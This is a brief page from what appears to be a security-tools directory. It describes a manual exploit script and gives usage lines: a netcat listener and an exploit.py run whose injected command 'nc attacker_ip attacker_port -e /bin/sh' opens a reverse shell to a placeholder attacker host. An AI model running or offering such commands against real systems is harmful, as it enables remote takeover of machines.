Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!
Discover the most used tools by our community.
Explore all tools
Browse our collection of tools
The goal of this script NOT to use Metasploit and to do it manually.
Usage:
nc -lvnp 4466
Running the exploit:
python3 ./exploit.py -t target_ip -p target_port -c "nc attacker_ip attacker_port -e /bin/sh"